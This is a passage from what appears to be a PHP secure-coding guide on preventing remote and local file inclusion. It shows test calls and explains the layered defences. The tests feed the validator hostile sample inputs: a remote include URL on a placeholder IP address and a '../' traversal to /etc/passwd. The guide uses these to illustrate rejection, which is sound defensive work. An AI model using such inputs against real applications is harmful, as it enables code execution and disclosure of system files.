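var_dump(resolve_local_include(APP_ROOT, 'http://203.0.113.5/x.txt'));   // wrapper scheme
var_dump(resolve_local_include(APP_ROOT, '../../../../etc/passwd'));     // escapes root
var_dump(load_plugin('Online_Users'));                                    // false unless the file exists
```

The order of the defences matters: deriving the path from `__DIR__` (or a constant set in a configuration file the request cannot touch) removes the bug for the fixed-path includes quoted in the advisories, and `resolve_local_include` covers the remaining case where part of the name legitimately comes from the request. The `ini_get` check is a deployment guard rather than a fix; with `allow_url_include` off, the same bug degrades from remote code execution to local file inclusion, which is still worth fixing in the code.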



[d]esign by Amanda [e]dited by NoGe